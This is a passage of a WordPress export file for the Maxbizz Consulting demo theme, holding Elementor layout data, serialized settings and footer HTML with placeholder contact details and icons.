		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.4]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"6883fb1","elType":"section","settings":{"structure":"22","background_background":"classic","background_color":"#F5F5F5"},"elements":[{"id":"bae537d","elType":"column","settings":{"_column_size":33,"_inline_size":86.974999999999994315658113919198513031005859375,"content_position":"center"},"elements":[{"id":"e209fcf","elType":"widget","settings":{"editor":"<p>Maxbizz The Largest Business Expert in USA &amp; Europe. We Provide The Solutions to Grow Your Business.<\/p>","typography_typography":"custom","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"600","text_color":"#5F5F5F"},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"3c6c353","elType":"column","settings":{"_column_size":66,"_inline_size":12.0069999999999996731503415503539144992828369140625,"align":"flex-end","_ot_column_min_width":{"unit":"px","size":165,"sizes":[]},"_ot_content_align":"horizontal"},"elements":[{"id":"856df84","elType":"widget","settings":{"text":"CONTACT US","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":13,"sizes":[]},"typography_font_weight":"500","background_color":"#52C5B6","button_background_hover_color":"#30344D","border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":true},"text_padding":{"unit":"px","top":"13","right":"28","bottom":"12","left":"28","isLinked":false}},"elements":[],"widgetType":"button"}],"isInner":false}],"isInner":false},{"id":"e4091a8","elType":"section","settings":{"content_position":"middle","structure":"20","padding":{"unit":"px","top":"16","right":"0","bottom":"16","left":"0","isLinked":false}},"elements":[{"id":"95b9eb7","elType":"column","settings":{"_column_size":50,"_inline_size":20},"elements":[{"id":"ac2109b","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05_Black.svg","id":389},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"27b0423","elType":"column","settings":{"_column_size":50,"_inline_size":80,"_ot_content_align":"horizontal","align":"flex-end"},"elements":[{"id":"1f76ab2","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"0","isLinked":false},"link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"aec3252","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":24,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"26188f4","elType":"widget","settings":{"title_text":"Our Working Hours","description_text":"Mon - Sat: 8.00 - 18.00","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/symbol.svg","id":356},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false}},"elements":[],"widgetType":"icon-box"}],"isInner":false}],"isInner":false},{"id":"df85639","elType":"section","settings":{"structure":"22","background_background":"classic","background_color":"#30344D","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"}},"elements":[{"id":"5ff3000","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"f7bff2e","elType":"widget","settings":{"nav_menu":"main-menu","text_color":"#FFFFFF","text_hover_color":"#52C5B6","smenu_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":10,"spread":0,"color":""},"menu_typography_typography":"custom","menu_typography_font_weight":"500"},"elements":[],"widgetType":"imenu"}],"isInner":false},{"id":"42df45d","elType":"column","settings":{"_column_size":33,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"94c7570","elType":"widget","settings":{"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"20","isLinked":false},"icon_color":"#FFFFFF","bg_btn":"#52C5B6"},"elements":[],"widgetType":"isearch"},{"id":"ea13c65","elType":"widget","settings":{"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"30","isLinked":false},"icon_color":"#FFFFFF"},"elements":[],"widgetType":"isidepanel"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:4:{s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:10:"text_color";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:6;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:5:{s:12:"_inline_size";i:6;s:16:"content_position";i:1;s:5:"align";i:3;s:20:"_ot_column_min_width";i:1;s:17:"_ot_content_align";i:3;}}}}s:6:"button";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_button";a:1:{s:4:"text";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:10:{s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:16:"background_color";i:1;s:29:"button_background_hover_color";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;s:13:"border_radius";i:1;s:12:"text_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:3;}s:14:"section_layout";a:1:{s:16:"content_position";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:2;s:16:"background_color";i:2;}s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:7:"padding";i:1;}}}}s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:1;}}s:5:"style";a:2:{s:18:"section_style_icon";a:3:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;}s:21:"section_style_content";a:12:{s:26:"content_vertical_alignment";i:3;s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:3;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:5:"style";a:2:{s:18:"style_menu_section";a:4:{s:10:"text_color";i:1;s:16:"text_hover_color";i:1;s:26:"menu_typography_typography";i:1;s:27:"menu_typography_font_weight";i:1;}s:19:"style_smenu_section";a:1:{s:23:"smenu_shadow_box_shadow";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}s:5:"style";a:2:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}s:18:"style_form_section";a:1:{s:6:"bg_btn";i:1;}}}}s:10:"isidepanel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Footer 1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/ot_footer_builders/footer-1/</link>
		<pubDate>Fri, 24 Jul 2020 09:02:09 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_footer_builders&#038;p=300</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz-consulting/">
					<img src="https://maxbizz.s3.amazonaws.com/images/02_White.svg" alt="Maxbizz Consulting">
				</a>			        
		<p>We make this belief a reality by putting clients first, leading with exceptional ideas, doing the right thing, and giving back.</p>		
					<a href="#" target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Linkedin-in
											</a>
			<h6>About us</h6>		
					<ul>
							<li>
					<a href="#">					Contact us 
											</a>
									</li>
								<li>
					<a href="#">					Connect
											</a>
									</li>
								<li>
					<a href="#">					Subscribe
											</a>
									</li>
								<li>
					<a href="#">					Terms of use 
											</a>
									</li>
								<li>
					<a href="#">					Sitemap
											</a>
									</li>
						</ul>
					<ul>
							<li>
					<a href="#">					Careers
											</a>
									</li>
								<li>
					<a href="#">					Newsroom
											</a>
									</li>
								<li>
					<a href="#">					Case Studies
											</a>
									</li>
								<li>
					<a href="#">					Disclosures 
											</a>
									</li>
								<li>
					<a href="#">					Services
											</a>
									</li>
						</ul>
			<h6>Contacts</h6>		
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
				<a href="tel:+1-800-456-478-23">
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				<a href="mailto:maxbizz@mail.com">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
				<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a>
				</h6>
								<p>maxbizz@mail.com</p>
			<h6>Subscribe</h6>		
		<p>Subscribe to our newsletter. Be always in trend!</p><p>Copyright © 2020 Maxbizz by OceanThemes. All Rights Reserved.</p>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>300</wp:post_id>
		<wp:post_date><![CDATA[2020-07-24 09:02:09]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-24 09:02:09]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[footer-1]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_footer_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"fae9e04","elType":"section","settings":{"structure":"40","background_background":"classic","background_color":"#16171E","padding":{"unit":"px","top":"120","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"bb981be","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"60673b0","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02_White.svg","id":1416},"_margin":{"unit":"px","top":"0","right":"0","bottom":"32","left":"0","isLinked":false},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"},{"id":"1eb16be","elType":"widget","settings":{"editor":"<p>We make this belief a reality by putting clients first, leading with exceptional ideas, doing the right thing, and giving back.<\/p>","text_color":"#C0C1C2","typography_typography":"custom","typography_line_height":{"unit":"px","size":30,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"fa79ab8","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-linkedin-in","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}}],"shape":"circle","align":"left","icon_size":{"unit":"px","size":12,"sizes":[]},"icon_padding":{"unit":"em","size":0.90000000000000002220446049250313080847263336181640625,"sizes":[]},"icon_spacing":{"unit":"px","size":14,"sizes":[]},"image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(0, 0, 0, 0.2)","icon_color":"custom","hover_primary_color":"#4B83FC","icon_secondary_color":"#FFFFFF","icon_primary_color":"#24262F","columns":"3"},"elements":[],"widgetType":"social-icons"}],"isInner":false},{"id":"1680f0a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"1267add","elType":"widget","settings":{"title":"About us","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":22,"sizes":[]},"typography_font_weight":"600","_margin":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"fbd6b12","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20"},"elements":[{"id":"265897a","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_mobile":50,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"12","left":"0","isLinked":false}},"elements":[{"id":"1b77f88","elType":"widget","settings":{"icon_list":[{"text":"Contact us ","selected_icon":{"value":"","library":""},"_id":"dd541d7","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Connect","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"04c8029"},{"text":"Subscribe","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"0bf2a4d"},{"text":"Terms of use ","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"30f616c"},{"text":"Sitemap","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"5720c29"}],"space_between":{"unit":"px","size":10,"sizes":[]},"text_color":"#C0C1C2","text_color_hover":"#4B83FC","text_indent":{"unit":"px","size":0,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"icon-list"}],"isInner":true},{"id":"7e3afb4","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_mobile":50},"elements":[{"id":"b4606d1","elType":"widget","settings":{"icon_list":[{"text":"Careers","selected_icon":{"value":"","library":""},"_id":"dd541d7","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Newsroom","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"04c8029"},{"text":"Case Studies","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"0bf2a4d"},{"text":"Disclosures ","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"30f616c"},{"text":"Services","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"5720c29"}],"space_between":{"unit":"px","size":10,"sizes":[]},"text_color":"#C0C1C2","text_color_hover":"#4B83FC","text_indent":{"unit":"px","size":0,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"icon-list"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"e888848","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"6be35dc","elType":"widget","settings":{"title":"Contacts","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":22,"sizes":[]},"typography_font_weight":"600","_margin":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"05e2c05","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"1366f2d","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":21,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"388fcf5","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","icon_space":{"unit":"px","size":22,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"}],"isInner":false},{"id":"0c63cfe","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"36a2873","elType":"widget","settings":{"title":"Subscribe","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":22,"sizes":[]},"typography_font_weight":"600","_margin":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e349af9","elType":"widget","settings":{"wp":{"title":""},"_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"wp-widget-mc4wp_form_widget"},{"id":"b95d22f","elType":"widget","settings":{"editor":"<p>Subscribe to our newsletter. Be always in trend!<\/p>","text_color":"#C0C1C2"},"elements":[],"widgetType":"text-editor"}],"isInner":false}],"isInner":false},{"id":"de9425d","elType":"section","settings":{"background_background":"classic","background_color":"#16171E"},"elements":[{"id":"5c90953","elType":"column","settings":{"_column_size":100,"_inline_size":null,"border_width":{"unit":"px","top":"1","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"7456be1","elType":"section","settings":{"layout":"full_width","border_border":"solid","border_width":{"unit":"px","top":"1","right":"0","bottom":"0","left":"0","isLinked":false},"border_color":"rgba(255, 255, 255, 0.1)","padding":{"unit":"px","top":"25","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[{"id":"0bb002f","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"23f3334","elType":"widget","settings":{"editor":"<p>Copyright \u00a9 2020 Maxbizz by OceanThemes. All Rights Reserved.<\/p>","align":"center","text_color":"#929399","typography_typography":"custom","typography_font_size":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:3;s:21:"typography_typography";i:2;s:22:"typography_line_height";i:1;s:5:"align";i:1;s:20:"typography_font_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:2:{s:7:"content";a:1:{s:19:"section_social_icon";a:4:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:8:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i: